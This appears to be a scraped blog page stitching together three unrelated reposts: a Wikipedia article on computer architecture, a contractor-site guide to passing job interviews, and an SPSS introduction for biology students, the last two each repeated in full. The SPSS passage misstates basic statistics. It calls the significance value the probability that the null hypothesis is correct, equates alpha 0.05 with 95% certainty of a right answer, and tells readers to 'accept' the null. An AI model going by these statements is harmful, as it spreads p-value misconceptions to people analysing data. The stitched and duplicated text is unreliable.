More specific usages of the term include more general wider-scale hardware architectures, such as cluster computing and Non-Uniform Memory Access (NUMA) architectures.
Contents [hide]
1 History
2 Computer architectures
3 Computer architecture topics
3.1 Sub-definitions
3.2 The Role Of Computer Architecture
3.2.1 Computer Architecture: The Definition
3.2.2 Instruction Set Architecture
3.2.3 Computer Organization
3.3 Design goals
3.4 Performance
3.5 Power consumption
4 See also
5 Notes
6 References
7 External links
[edit]History
The term “architecture” in computer literature can be traced to the work of Lyle R. Johnson and Frederick P. Brooks, Jr., members in 1959 of the Machine Organization department in IBM’s main research center. Johnson had the opportunity to write a proprietary research communication about Stretch, an IBM-developed supercomputer for Los Alamos Scientific Laboratory. In attempting to characterize his chosen level of detail for discussing the luxuriously embellished computer, he noted that his description of formats, instruction types, hardware parameters, and speed enhancements was at the level of “system architecture” – a term that seemed more useful than “machine organization”. Subsequently, Brooks, one of the Stretch designers, started Chapter 2 of a book (Planning a Computer System: Project Stretch, ed. W. Buchholz, 1962) by writing, “Computer architecture, like other architecture, is the art of determining the needs of the user of a structure and then designing to meet those needs as effectively as possible within economic and technological constraints”. Brooks went on to play a major role in the development of the IBM System/360 line of computers, where “architecture” gained currency as a noun with the definition “what the user needs to know”. Later the computer world would employ the term in many less-explicit ways.
The first mention of the term architecture in the referred computer literature is in a 1964 article describing the IBM System/360.[3] The article defines architecture as the set of “attributes of a system as seen by the programmer, i.e., the conceptual structure and functional behavior, as distinct from the organization of the data flow and controls, the logical design, and the physical implementation”. In the definition, the programmer perspective of the computer’s functional behavior is key. The conceptual structure part of an architecture description makes the functional behavior comprehensible, and extrapolatable to a range of Use cases. Only later on did ‘internals’ such as “the way by which the CPU performs internally and accesses addresses in memory,” mentioned above, slip into the definition of computer architecture.
[edit]Computer architectures
There are many types of computer architectures:
Quantum computer vs Chemical computer
Scalar processor vs Vector processor
Non-Uniform Memory Access (NUMA) computers
Register machine vs Stack machine
Harvard architecture vs von Neumann architecture
Cellular architecture
The quantum computer architecture holds the most promise to revolutionize computing.[4]
[edit]Computer architecture topics
[edit]Sub-definitions
Some practitioners of computer architecture at companies such as Intel and AMD use more fine distinctions:
Macroarchitecture — architectural layers that are more abstract than microarchitecture, e.g. ISA
Instruction Set Architecture (ISA) — as defined above
Assembly ISA — a smart assembler may convert an abstract assembly language common to a group of machines into slightly different machine language for different implementations
Programmer Visible Macroarchitecture — higher level language tools such as compilers may define a consistent interface or contract to programmers using them, abstracting differences between underlying ISA, UISA, and microarchitectures. E.g. the C, C++, or Java standards define different Programmer Visible Macroarchitecture — although in practice the C microarchitecture for a particular computer includes
UISA (Microcode Instruction Set Architecture) — a family of machines with different hardware level microarchitectures may share a common microcode architecture, and hence a UISA.
Pin Architecture — the set of functions that a microprocessor is expected to provide, from the point of view of a hardware platform. E.g. the x86 A20M, FERR/IGNNE or FLUSH pins, and the messages that the processor is expected to emit after completing a cache invalidation so that external caches can be invalidated. Pin architecture functions are more flexible than ISA functions - external hardware can adapt to changing encodings, or changing from a pin to a message - but the functions are expected to be provided in successive implementations even if the manner of encoding them changes.
[edit]The Role Of Computer Architecture
[edit]Computer Architecture: The Definition
The coordination of abstract levels of a processor under changing forces, involving design, measurement and evaluation.it also include the overall fundamental working principle of the internal logical structure of a computer system.
[edit]Instruction Set Architecture
The ISA is the interface between the software and hardware. It is the set of instructions that bridges the gap between high level languages and the hardware. For a processor to understand a command, it should be in binary. The ISA encodes these values.
The ISA also defines the items in the computer that are available to a programmer. For example, it defines data types, registers, addressing modes, memory organization etc. Registers are high speed storage for numbers that can be accessed by a processor. Data as well as instructions can be in a register.
Addressing modes are the way that an instruction locates its operands.
Memory organization defines how instructions interact with the memory.
[edit]Computer Organization
Computer organization helps optimize performance-based products. For example, software engineers need to know the processing ability of processors. They may need to optimize software in order to gain the most performance at the least expense. This can require quite detailed analysis of the computer organization. For example, in a multimedia decoder, the designers might need to arrange for most data to be processed in the fastest data path.
Computer organization also helps plan the selection of a processor for a particular project. Multimedia projects may need very rapid data access, while supervisory software may need fast interrupts.
Sometimes certain tasks need additional components as well. For example, a computer capable of virtualization needs virtual memory hardware so that the memory of different simulated computers can be kept separated.
The computer organization and features also affect the power consumption and the cost of the processor.
[edit]Design goals
The exact form of a computer system depends on the constraints and goals for which it was optimized. Computer architectures usually trade off standards, cost, memory capacity, latency and throughput. Sometimes other considerations, such as features, size, weight, reliability, expandability and power consumption are factors as well.
The most common scheme carefully chooses the bottleneck that most reduces the computer's speed. Ideally, the cost is allocated proportionally to assure that the data rate is nearly the same for all parts of the computer, with the most costly part being the slowest. This is how skillful commercial integrators optimize personal computers.
[edit]Performance
Computer performance is often described in terms of clock speed (usually in MHz or GHz). This refers to the cycles per second of the main clock of the CPU. However, this metric is somewhat misleading, as a machine with a higher clock rate may not necessarily have higher performance. As a result manufacturers have moved away from clock speed as a measure of performance.
Computer performance can also be measured with the amount of cache a processor has. If the speed, MHz or GHz, were to be a car then the cache is like the gas tank. No matter how fast the car goes, it will still need to get gas. The higher the speed, and the greater the cache, the faster a processor runs.[dubious – discuss]
Modern CPUs can execute multiple instructions per clock cycle, which dramatically speeds up a program. Other factors influence speed, such as the mix of functional units, bus speeds, available memory, and the type and order of instructions in the programs being run.
There are two main types of speed, latency and throughput. Latency is the time between the start of a process and its completion. Throughput is the amount of work done per unit time. Interrupt latency is the guaranteed maximum response time of the system to an electronic event (e.g. when the disk drive finishes moving some data). Performance is affected by a very wide range of design choices — for example, pipelining a processor usually makes latency worse (slower) but makes throughput better. Computers that control machinery usually need low interrupt latencies. These computers operate in a real-time environment and fail if an operation is not completed in a specified amount of time. For example, computer-controlled anti-lock brakes must begin braking almost immediately after they have been instructed to brake.
The performance of a computer can be measured using other metrics, depending upon its application domain. A system may be CPU bound (as in numerical calculation), I/O bound (as in a webserving application) or memory bound (as in video editing). Power consumption has become important in servers and portable devices like laptops.
Benchmarking tries to take all these factors into account by measuring the time a computer takes to run through a series of test programs. Although benchmarking shows strengths, it may not help one to choose a computer. Often the measured machines split on different measures. For example, one system might handle scientific applications quickly, while another might play popular video games more smoothly. Furthermore, designers have been known to add special features to their products, whether in hardware or software, which permit a specific benchmark to execute quickly but which do not offer similar advantages to other, more general tasks.
[edit]Power consumption
Main article: low-power electronics
Power consumption is another design criterion that factors in the design of modern computers. Power efficiency can often be traded for performance or cost benefits. With the increasing power density of modern circuits as the number of transistors per chip scales (Moore's law), power efficiency has increased in importance. Recent processor designs such as the Intel Core 2 put more emphasis on increasing power efficiency. Also, in the world of embedded computing, power efficiency has long been and remains the primary design goal next to performance.
[edit]See also
Computer science portal
Computer hardware
CPU design
Orthogonal instruction set
Software architecture
Computer organization
von Neumann architecture
Influence of the IBM-PC on the personal computer market
[edit]Notes
John L. Hennessy and David Patterson (2006). Computer Architecture: A Quantitative Approach (Fourth Edition ed.). Morgan Kaufmann. ISBN 978-0-12-370490-0.
Barton, Robert S., "Functional Design of Computers", Communications of the ACM 4(9): 405 (1961).
Barton, Robert S., "A New Approach to the Functional Design of a Digital Computer", Proceedings of the Western Joint Computer Conference, May 1961, pp.393-396. About the design of the Burroughs B5000 computer.
Bell, C. Gordon; and Newell, Allen (1971). "Computer Structures: Readings and Examples", McGraw-Hill.
Blaauw, G.A., and Brooks, F.P., Jr., "The Structure of System/360, Part I-Outline of the Logical Structure", IBM Systems Journal, vol. 3, no. 2, pp. 119-135, 1964.
Tanenbaum, Andrew S. (1979). Structured Computer Organization. Englewood Cliffs, New Jersey: Prentice-Hall. ISBN 0-13-148521-0.
[edit]References
This article needs additional citations for verification.
Please help improve this article by adding reliable references. Unsourced material may be challenged and removed. (November 2008)
^ John L. Hennessy and David A. Patterson. Computer Architecture: A Quantitative Approach (Third Edition ed.). Morgan Kaufmann Publishers.
^ Laplante, Phillip A. (2001). Dictionary of Computer Science, Engineering, and Technology. CRC Press. pp. 94-95. ISBN 0849326915.
^ Amdahl, G.M.; Blaauw, G.A.; and Brooks, F.P., Jr., Architecture of the IBM System/360, IBM Journal of Research and Development, April 1964
^ "Computer architecture: fundamentals and principles of computer design" by Joseph D. Dumas 2006. page 340.
[edit]External links
This article's use of external links may not follow Wikipedia's policies or guidelines. Please improve this article by removing excessive and inappropriate external links or by converting links into references. (January 2010)
ISCA: Proceedings of the International Symposium on Computer Architecture
Micro: IEEE/ACM International Symposium on Microarchitecture
HPCA: International Symposium on High Performance Computer Architecture
ASPLOS: International Conference on Architectural Support for Programming Languages and Operating Systems
ACM Transactions on Computer Systems
IEEE Computer Society
http://www.cs.wisc.edu/~arch/www
http://www.cs.wisc.edu/arch/www/people.html
http://www.codeproject.com/useritems/System_Design.asp - This approach allows beginners to easily break and design complex software systems.
Technical University of Catalonia, Department of Computer Architecture
The von Neumann Architecture of Computer Systems
[hide]
v • d • e
Digital systems
Components
Logic gate · Digital circuit · Integrated circuit (IC)
Theory
Boolean logic · Digital signal processing · Computer architecture
Applications
Digital audio · Digital photography · Digital video
Categories: Wikipedia requested diagram images | Computer architecture | Central processing unit
article discussion edit this page history
Try Beta Log in / create account
navigation
Main page
Contents
Featured content
Current events
Random article
search
interaction
About Wikipedia
Community portal
Recent changes
Contact Wikipedia
Donate to Wikipedia
Help
toolbox
What links here
Related changes
Upload file
Special pages
Printable version
Permanent link
Cite this page
languages
العربية
বাংলা
Bosanski
Български
Català
Deutsch
Español
Euskara
فارسی
Français
한국어
Hrvatski
Bahasa Indonesia
Italiano
Latviešu
Magyar
Bahasa Melayu
Nederlands
日本語
Polski
Português
Русский
Simple English
Slovenčina
Suomi
Svenska
தமிழ்
ไทย
Türkçe
Українська
Tiếng Việt
中文
This page was last modified on 7 March 2010 at 23:42.
Text is available under the Creative Commons Attribution-ShareAlike License; additional terms may apply. See Terms of Use for details.
Wikipedia® is a registered trademark of the Wikimedia Foundation, Inc., a non-profit organization.
Contact us Privacy policy About Wikipedia Disclaimers
Monday, March 8, 2010
How to Pass an Interview ?
Skip to Content
Skip to Navigation
Advert
How to pass an interview
Introduction
Having experience of being an interviewer and an interviewee means I get to see both sides of the equation. As an interviewer I find nothing more tedious than a techie spouting on about how wonderful the new technologies are and how they are the answer to all our problems. The majority of all software projects that fail have nothing to do with the technology and more to do with failures in project management than anything else. Failure to extract the correct requirements and manage them is in my opinion the biggest reason for failure. No ‘cool’ technology is going to solve that problem.
The strongest piece of advice I can give any developer prior to an interview is to demonstrate to the interviewer they are focused on building the simplest thing that will work in order to solve the business problem.
Here are my other tips for successful interview technique:
Firstly, no advice about firm hand shakes, and looking people in the eye. If you are confident and know your subject, the interviewer won’t care if you don’t crush their hand or look at them lovingly!
Look smart. It's irrelevant of course in terms of your ability, but alas, smart clothes create a good first impression. You also might be client facing. So, it’s worth proving that you shower every now and then and know how to put a tie on!
The main purpose of the interview is to hire the 'best fit'. The 'best fit' could be a back room technical geeky genius or someone less technical and more business aware. You'll need to gauge this at the interview. Then you can focus your questions to show that you fit the role they have described.
Never focus on why the role would be good for you and what you would get out of it. The client does not care. They are solely interested in whether they can trust you to do the job on time and to budget.
Never try to pretend that you know something that you don't. You will be caught out. No one hires a blagger. They are far too risky. The boss wants to know that at the end of the day they can trust you to either get something done, or put your hand up and ask for help. Honesty goes a long way. If you have to take a guess, then explain that it is a guess beforehand. If you do not know how to solve something, admit you don't, but suggest how and where you could find the solution. It shows you are resourceful.
Just answer the question. It is easy for techies to 'go off on one' and get carried away by drilling down into some detailed technical area when it is not required. Provide the information necessary and ask the interviewer if that covers what they wanted to know.
Don't interrupt. Remember your manners and wait for the other person to finish speaking. Make notes whilst they are speaking if you are worried you'll forget your points by the time they have finished. Watch out for your eagerness being mistaken for simply being rude.
Try to ensure the conversation is evenly balanced. If they speak for 90% of the time you won't get your points across and be able to impress them. If you speak 90% of the time they will think you talk too much and are a poor listener.
Prepare your questions. Create a set of open questions that provoke conversations about topics which you know a lot about. No one else in that room is going to blow your trumpet. You've got to blow it yourself. Filter your prepared questions that are relevant to the position they have explained to you during the interview.
Unless the position is highly technical then avoid getting bogged down in deep technical discussions that do not give you the opportunity to demonstrate your skills in other areas like software process and lifecycle.
Align your responses based on the interviewer. If they are non technical then don't bore them with deep technical information they know nothing about. They won't be impressed. Use the buzzwords and describe the benefits in terms of how it can help improve the business and hit deadlines. If they are very technical then you might want to get heavily technical to show them you know what you are talking about.
Ask them about the business problem. You are potentially going to be hired as an IT doctor to diagnose and solve their business problems with technology. Your not being hired to use the latest Whizz-bang CV compliant technology, but are there to help their business. Demonstrate that you are focused on providing business value, rather than just using the latest technology to build 'cool stuff'. This is key.
Treat the exercise as a skill matching exercise. You are trying to evaluate if it is a good fit. Be yourself and find out as much as you need to about the role. Don't wait until day 1 to realise that it is 9 months analysis when you would prefer to start designing from already documented requirements.
Show that you know and understand the commercial realities of software development. For example, when suggesting solutions and discussing approaches you should be aware of the difference between tactical and strategic solutions. You should understand why they just want to knock up a quick fix solution, rather than turn a requirement into a software science project. Being aware of the balance between cost of solution and the practicalities is very important.
Show that you have an understanding of where technology is heading. Assuming you read web sites, and journals regularly, ensure you get that across to the interviewer. It is a big bonus if you can show you understand what is coming up, rather than still sticking to old versions of software.
Demonstrate that you understand the project life cycle, together with some formal iterative methodologies. However, don't give the impression that everything must be done formally. Show that you understand the balance between 'over doing it' from and 'getting the job done'.
Never discuss rates and hours with the interviewer unless you have personal commitments that they need to be aware of. If you are worried about 'number of hours' on a daily rate, then get it put into the contract that a day consists of 8 hours of your services. Anything more is chargeable pro rata.
Don't give the impression you know everything. You actually know very little, except a lot about one very small subject. No one likes an ego - they wreck teams and cause mayhem.
Sum up at the end and summarise how you think you can help, and also the areas that you cannot help. For example, you may be great at VBScript, but a novice at JavaScript. Make sure you mention this. If you don't want the job then say so there and then. The interviewer will respect you for saying so.
Do some homework about the company before the interview. A quick hour search on internet will be okay. Get some facts and shoe horn a couple of quotes into the interview to show them that you have found out about the company. It's the fact that you made the effort to find out that is important.
And lastly, show that you are human. Use your sense of humour.
Updated Monday, October 02, 2006, [Originally published Wednesday, June 25, 2003]
© 2010 All rights reserved. Reproduction in whole or in part without permission is prohibited.
Also of interest...
Related Guides:
Preparing for an interview
The Killer Interview Technique
Common Interview Mistakes
How to Find a Contract
Accepting & Signing an Offer
Related Calculators:
Contractor Calculator
Contract Comparison Calculator
Permanent To Contracting Calculator
Target Income Calculator
Email to a friend
Printer friendly
Comment on this article
Send author feedback
Follow us on Twitter
Contractor Newsletter
Get specialist, industry specific contracting news direct to your inbox every month.
View this months Newsletter ›
View ALL NewsCasts ›
Job Search
Related Guides:
Preparing for an interview
The Killer Interview Technique
Common Interview Mistakes
How to Find a Contract
Accepting & Signing an Offer
Related Calculators:
Contractor Calculator
Contract Comparison Calculator
Permanent To Contracting Calculator
Target Income Calculator
Latest Site Updates
IT contractor demand soars by 26% but there are still more contractors than contracts
‘Green shoots’ are showing in the UK’s ICT labour market, as spending rises and IT contractors see demand soar by 26%, according to e-skills.
ContractorCalculator: Contracting news in brief
News this week shows a more promising contractor landscape as several economic surveys strongly indicate the UK is surging out of recession.
Time for re-armament as the clash of online accountants and their critics begins
Has contractor accountancy changed all that much since spreadsheets came into common usage? Online accountancy will drive real change for the better.
Contractors and the rise of the online contractor accountant
Online contractor accountants are driving a paradigm shift in the way that contractors can record and manage their bookkeeping, accounts and tax.
Popular Pages
Contracting Guides
Guides for contractors.
Umbrella Companies
What are they? How do you use one?
FREE - IR35 Special Report
10 year anniversary special. 36 page PDF report.
Contractor Marketplace
Market yourself direct to clients. Free to join!
Advertisers
Advertisers
Bedouin Group
No more IR35. Retain up to 85% of your earnings.
Tarpon – IR35 Umbrella Company
Increase your earnings today. Try our free salary calculator now.
Darwin Pay - up to 88% Return
Contractors can take home up to 88% of the contract safely.
Contractors Handbook
The expert guide for UK contractors and freelancers
Parasol - umbrella company
The UK’s favourite umbrella company. Award winning service, fast set up.
Contractor Services
Mortgages
Insurances
Contractor Pensions
Contractor Income Protection
Professional Contractors Group
Contractor Marketplace
Company Formation
IR35 Services
You Are Here:
HomeArticlesHow to pass an interview
Home
Guides
News
Calculators
Company Formation
Insurance
Mortgages
Pensions
Resources
ContractorCalculator, the UK authority on contracting, has regular independent verifications by ABCe of over 100,000 unique visitors per month. And as the only contractor website with an ongoing commitment to these industry standard audits you can invest in our marketing solutions with confidence and trust.
Advertising with usContact UsAbout usOur press releasesFeedbackSite mapTerms of UsePrivacy statement
© Copyright 2009 Byte-Vision Limited UK. All rights reserved Copyright notice
All calculations verified by D J Colom Accountants
Part of ContractorCalculator.co.uk.
RSS Feeds:
Follow us on Twitter
Follow us on Twitter IR35 Tax CalculatorsAdvert
The UK's leading contractor site. Independently audited traffic (ABCe) – 107,479 monthly unique visitors.
Skip to Navigation
Advert
How to pass an interview
Introduction
Having experience of being an interviewer and an interviewee means I get to see both sides of the equation. As an interviewer I find nothing more tedious than a techie spouting on about how wonderful the new technologies are and how they are the answer to all our problems. The majority of all software projects that fail have nothing to do with the technology and more to do with failures in project management than anything else. Failure to extract the correct requirements and manage them is in my opinion the biggest reason for failure. No ‘cool’ technology is going to solve that problem.
The strongest piece of advice I can give any developer prior to an interview is to demonstrate to the interviewer they are focused on building the simplest thing that will work in order to solve the business problem.
Here are my other tips for successful interview technique:
Firstly, no advice about firm hand shakes, and looking people in the eye. If you are confident and know your subject, the interviewer won’t care if you don’t crush their hand or look at them lovingly!
Look smart. It's irrelevant of course in terms of your ability, but alas, smart clothes create a good first impression. You also might be client facing. So, it’s worth proving that you shower every now and then and know how to put a tie on!
The main purpose of the interview is to hire the 'best fit'. The 'best fit' could be a back room technical geeky genius or someone less technical and more business aware. You'll need to gauge this at the interview. Then you can focus your questions to show that you fit the role they have described.
Never focus on why the role would be good for you and what you would get out of it. The client does not care. They are solely interested in whether they can trust you to do the job on time and to budget.
Never try to pretend that you know something that you don't. You will be caught out. No one hires a blagger. They are far too risky. The boss wants to know that at the end of the day they can trust you to either get something done, or put your hand up and ask for help. Honesty goes a long way. If you have to take a guess, then explain that it is a guess beforehand. If you do not know how to solve something, admit you don't, but suggest how and where you could find the solution. It shows you are resourceful.
Just answer the question. It is easy for techies to 'go off on one' and get carried away by drilling down into some detailed technical area when it is not required. Provide the information necessary and ask the interviewer if that covers what they wanted to know.
Don't interrupt. Remember your manners and wait for the other person to finish speaking. Make notes whilst they are speaking if you are worried you'll forget your points by the time they have finished. Watch out for your eagerness being mistaken for simply being rude.
Try to ensure the conversation is evenly balanced. If they speak for 90% of the time you won't get your points across and be able to impress them. If you speak 90% of the time they will think you talk too much and are a poor listener.
Prepare your questions. Create a set of open questions that provoke conversations about topics which you know a lot about. No one else in that room is going to blow your trumpet. You've got to blow it yourself. Filter your prepared questions that are relevant to the position they have explained to you during the interview.
Unless the position is highly technical then avoid getting bogged down in deep technical discussions that do not give you the opportunity to demonstrate your skills in other areas like software process and lifecycle.
Align your responses based on the interviewer. If they are non technical then don't bore them with deep technical information they know nothing about. They won't be impressed. Use the buzzwords and describe the benefits in terms of how it can help improve the business and hit deadlines. If they are very technical then you might want to get heavily technical to show them you know what you are talking about.
Ask them about the business problem. You are potentially going to be hired as an IT doctor to diagnose and solve their business problems with technology. Your not being hired to use the latest Whizz-bang CV compliant technology, but are there to help their business. Demonstrate that you are focused on providing business value, rather than just using the latest technology to build 'cool stuff'. This is key.
Treat the exercise as a skill matching exercise. You are trying to evaluate if it is a good fit. Be yourself and find out as much as you need to about the role. Don't wait until day 1 to realise that it is 9 months analysis when you would prefer to start designing from already documented requirements.
Show that you know and understand the commercial realities of software development. For example, when suggesting solutions and discussing approaches you should be aware of the difference between tactical and strategic solutions. You should understand why they just want to knock up a quick fix solution, rather than turn a requirement into a software science project. Being aware of the balance between cost of solution and the practicalities is very important.
Show that you have an understanding of where technology is heading. Assuming you read web sites, and journals regularly, ensure you get that across to the interviewer. It is a big bonus if you can show you understand what is coming up, rather than still sticking to old versions of software.
Demonstrate that you understand the project life cycle, together with some formal iterative methodologies. However, don't give the impression that everything must be done formally. Show that you understand the balance between 'over doing it' from and 'getting the job done'.
Never discuss rates and hours with the interviewer unless you have personal commitments that they need to be aware of. If you are worried about 'number of hours' on a daily rate, then get it put into the contract that a day consists of 8 hours of your services. Anything more is chargeable pro rata.
Don't give the impression you know everything. You actually know very little, except a lot about one very small subject. No one likes an ego - they wreck teams and cause mayhem.
Sum up at the end and summarise how you think you can help, and also the areas that you cannot help. For example, you may be great at VBScript, but a novice at JavaScript. Make sure you mention this. If you don't want the job then say so there and then. The interviewer will respect you for saying so.
Do some homework about the company before the interview. A quick hour search on internet will be okay. Get some facts and shoe horn a couple of quotes into the interview to show them that you have found out about the company. It's the fact that you made the effort to find out that is important.
And lastly, show that you are human. Use your sense of humour.
Updated Monday, October 02, 2006, [Originally published Wednesday, June 25, 2003]
© 2010 All rights reserved. Reproduction in whole or in part without permission is prohibited.
Also of interest...
Related Guides:
Preparing for an interview
The Killer Interview Technique
Common Interview Mistakes
How to Find a Contract
Accepting & Signing an Offer
Related Calculators:
Contractor Calculator
Contract Comparison Calculator
Permanent To Contracting Calculator
Target Income Calculator
Email to a friend
Printer friendly
Comment on this article
Send author feedback
Follow us on Twitter
Contractor Newsletter
Get specialist, industry specific contracting news direct to your inbox every month.
View this months Newsletter ›
View ALL NewsCasts ›
Job Search
Related Guides:
Preparing for an interview
The Killer Interview Technique
Common Interview Mistakes
How to Find a Contract
Accepting & Signing an Offer
Related Calculators:
Contractor Calculator
Contract Comparison Calculator
Permanent To Contracting Calculator
Target Income Calculator
Latest Site Updates
IT contractor demand soars by 26% but there are still more contractors than contracts
‘Green shoots’ are showing in the UK’s ICT labour market, as spending rises and IT contractors see demand soar by 26%, according to e-skills.
ContractorCalculator: Contracting news in brief
News this week shows a more promising contractor landscape as several economic surveys strongly indicate the UK is surging out of recession.
Time for re-armament as the clash of online accountants and their critics begins
Has contractor accountancy changed all that much since spreadsheets came into common usage? Online accountancy will drive real change for the better.
Contractors and the rise of the online contractor accountant
Online contractor accountants are driving a paradigm shift in the way that contractors can record and manage their bookkeeping, accounts and tax.
Popular Pages
Contracting Guides
Guides for contractors.
Umbrella Companies
What are they? How do you use one?
FREE - IR35 Special Report
10 year anniversary special. 36 page PDF report.
Contractor Marketplace
Market yourself direct to clients. Free to join!
Advertisers
Advertisers
Bedouin Group
No more IR35. Retain up to 85% of your earnings.
Tarpon – IR35 Umbrella Company
Increase your earnings today. Try our free salary calculator now.
Darwin Pay - up to 88% Return
Contractors can take home up to 88% of the contract safely.
Contractors Handbook
The expert guide for UK contractors and freelancers
Parasol - umbrella company
The UK’s favourite umbrella company. Award winning service, fast set up.
Contractor Services
Mortgages
Insurances
Contractor Pensions
Contractor Income Protection
Professional Contractors Group
Contractor Marketplace
Company Formation
IR35 Services
You Are Here:
HomeArticlesHow to pass an interview
Home
Guides
News
Calculators
Company Formation
Insurance
Mortgages
Pensions
Resources
ContractorCalculator, the UK authority on contracting, has regular independent verifications by ABCe of over 100,000 unique visitors per month. And as the only contractor website with an ongoing commitment to these industry standard audits you can invest in our marketing solutions with confidence and trust.
Advertising with usContact UsAbout usOur press releasesFeedbackSite mapTerms of UsePrivacy statement
© Copyright 2009 Byte-Vision Limited UK. All rights reserved Copyright notice
All calculations verified by D J Colom Accountants
Part of ContractorCalculator.co.uk.
RSS Feeds:
Follow us on Twitter
Follow us on Twitter IR35 Tax CalculatorsAdvert
The UK's leading contractor site. Independently audited traffic (ABCe) – 107,479 monthly unique visitors.
Introduction to SPSS
MicrobiologyBytes: Maths & Computers for Biologists: Introduction to SPSS Updated: February 6, 2009 Search
Introduction to SPSS
SPSS uses two main windows:
Data Editor: This is a spreadsheet-like window which contains the data to be analyzed. The data editor has two views:
Data View contains the data and is the view you see when you open the Data Editor. Clicking the tab at the bottom of the window brings up the:
Variable View This does not contain data, but displays information about the dataset that is stored with the dataset. From this window you can control how SPSS displays data.
Each Data Editor only contains one dataset, but you can open multiple Data Editors at one time, each of which contains a separate dataset. Datasets that are currently open are called working datasets and all data manipulations, statistical functions, and other SPSS procedures operate on these datasets.
In the Data Editor, columns represent variables (categories which are measured or counted) while rows represent cases (individual observations for a variable). Variable names must begin with a letter, e.g A1 is allowed but 1A is not. You can create and manipulate variables in Variable View, and enter or edit data in Data View.
Viewer: This is where the results of any analysis appear. From the viewer, you can format the output in a wide range of ways. You can also export results in a variety of formats, e.g. SPSS, text, MSWord, MSExcel, etc.
Other windows: SPSS also has a number of other windows, the most important of which is the Syntax Editor. In early versions of SPSS, all analysis was done through the use of syntax commands (mini computer programs) which instructed SPSS on how to process your data. In current versions of SPSS, analysis is usually performed using the pull-down menus and dialog boxes which allow you to control SPSS without ever writing syntax. SPSS syntax is very powerful but not easy to learn. However, using SPSS syntax allows you access to additional commands which are not available through the menus and dialog boxes, and syntax files can be stored and rerun at a later date, allowing you to repeat an analysis. Although you should be aware of this powerful feature of SPSS, we will not be using SPSS syntax commands on this module.
Data Entry and Manipulation
Although you can type data directly into the SPSS Data View window, this is tedious for large datasets and liable to introduce errors! If data is already available to you in an electronic format, import it into SPSS, don't type it in! Although SPSS has extensive capacities for reformatting data, if you want to manipulate data before analysis, you will probably find easier to do this in Excel and/or a text editor and then import the result into SPSS.
Menus:
There are ten menus in the SPSS Data View window:
File Edit Data Transform Analyze Graphs Utilities Window Help
Apart from the obvious menu functions such as File and Help, for the purpose of this module, the two most important menus are:
Analyze: provides access to the analytical tools in SPSS.
Graphs: provides access SPSS's extensive graph-making capabilities. The basic procedure for plotting a graph in SPSS is:
Select a variable for each axis - always put the independent variable (manipulated) on the x axis and the dependent variable (measured) on the y axis!
Interpreting SPSS Output:
The output from SPSS tests looks pretty confusing, but it isn't really. The main thing to look for is the Significance value. This is the probability that the null hypothesis is correct. Since we normally work with a significance (a) value of 0.05, i.e. a 95% certainty of getting the right answer:
If the Significance value is less than 0.05, REJECT the null hypothesis.
If the Significance value is greater than or equal to 0.05, ACCEPT the null hypothesis.
Of course this only works if you have the null hypothesis the right way round, or you'll still get the wrong answer.
Other things to remember about using SPSS:
The Significance value of any test needs to be less than 0.05 to be significant.
The Independent Variable is always the variable that you are predicting (i.e. what Ha predicts differences between).
The Dependent Variable is what you are measuring in order to tell if the groups (or conditions for repeated measures tests) are different. For correlations and chi-square, it does not matter which is the Independent or Dependent variable.
Ha always predicts a difference (for correlations, it predicts that r is different from zero, but another way of saying this is that there is a significant correlation) and Ho always predicts no difference.
If there is a WARNING box on your Output File, it is usually because you used the wrong test, or the wrong variables. Go back, think about it and double check.
You may also like to read:
SPSS for Windows: Getting Started
SPSS for Windows: Descriptive and Inferential Statistics
SPSS On-Line Training Workshop
© MicrobiologyBytes 2009.
Introduction to SPSS
SPSS uses two main windows:
Data Editor: This is a spreadsheet-like window which contains the data to be analyzed. The data editor has two views:
Data View contains the data and is the view you see when you open the Data Editor. Clicking the tab at the bottom of the window brings up the:
Variable View This does not contain data, but displays information about the dataset that is stored with the dataset. From this window you can control how SPSS displays data.
Each Data Editor only contains one dataset, but you can open multiple Data Editors at one time, each of which contains a separate dataset. Datasets that are currently open are called working datasets and all data manipulations, statistical functions, and other SPSS procedures operate on these datasets.
In the Data Editor, columns represent variables (categories which are measured or counted) while rows represent cases (individual observations for a variable). Variable names must begin with a letter, e.g A1 is allowed but 1A is not. You can create and manipulate variables in Variable View, and enter or edit data in Data View.
Viewer: This is where the results of any analysis appear. From the viewer, you can format the output in a wide range of ways. You can also export results in a variety of formats, e.g. SPSS, text, MSWord, MSExcel, etc.
Other windows: SPSS also has a number of other windows, the most important of which is the Syntax Editor. In early versions of SPSS, all analysis was done through the use of syntax commands (mini computer programs) which instructed SPSS on how to process your data. In current versions of SPSS, analysis is usually performed using the pull-down menus and dialog boxes which allow you to control SPSS without ever writing syntax. SPSS syntax is very powerful but not easy to learn. However, using SPSS syntax allows you access to additional commands which are not available through the menus and dialog boxes, and syntax files can be stored and rerun at a later date, allowing you to repeat an analysis. Although you should be aware of this powerful feature of SPSS, we will not be using SPSS syntax commands on this module.
Data Entry and Manipulation
Although you can type data directly into the SPSS Data View window, this is tedious for large datasets and liable to introduce errors! If data is already available to you in an electronic format, import it into SPSS, don't type it in! Although SPSS has extensive capacities for reformatting data, if you want to manipulate data before analysis, you will probably find easier to do this in Excel and/or a text editor and then import the result into SPSS.
Menus:
There are ten menus in the SPSS Data View window:
File Edit Data Transform Analyze Graphs Utilities Window Help
Apart from the obvious menu functions such as File and Help, for the purpose of this module, the two most important menus are:
Analyze: provides access to the analytical tools in SPSS.
Graphs: provides access SPSS's extensive graph-making capabilities. The basic procedure for plotting a graph in SPSS is:
Select a variable for each axis - always put the independent variable (manipulated) on the x axis and the dependent variable (measured) on the y axis!
Interpreting SPSS Output:
The output from SPSS tests looks pretty confusing, but it isn't really. The main thing to look for is the Significance value. This is the probability that the null hypothesis is correct. Since we normally work with a significance (a) value of 0.05, i.e. a 95% certainty of getting the right answer:
If the Significance value is less than 0.05, REJECT the null hypothesis.
If the Significance value is greater than or equal to 0.05, ACCEPT the null hypothesis.
Of course this only works if you have the null hypothesis the right way round, or you'll still get the wrong answer.
Other things to remember about using SPSS:
The Significance value of any test needs to be less than 0.05 to be significant.
The Independent Variable is always the variable that you are predicting (i.e. what Ha predicts differences between).
The Dependent Variable is what you are measuring in order to tell if the groups (or conditions for repeated measures tests) are different. For correlations and chi-square, it does not matter which is the Independent or Dependent variable.
Ha always predicts a difference (for correlations, it predicts that r is different from zero, but another way of saying this is that there is a significant correlation) and Ho always predicts no difference.
If there is a WARNING box on your Output File, it is usually because you used the wrong test, or the wrong variables. Go back, think about it and double check.
You may also like to read:
SPSS for Windows: Getting Started
SPSS for Windows: Descriptive and Inferential Statistics
SPSS On-Line Training Workshop
© MicrobiologyBytes 2009.
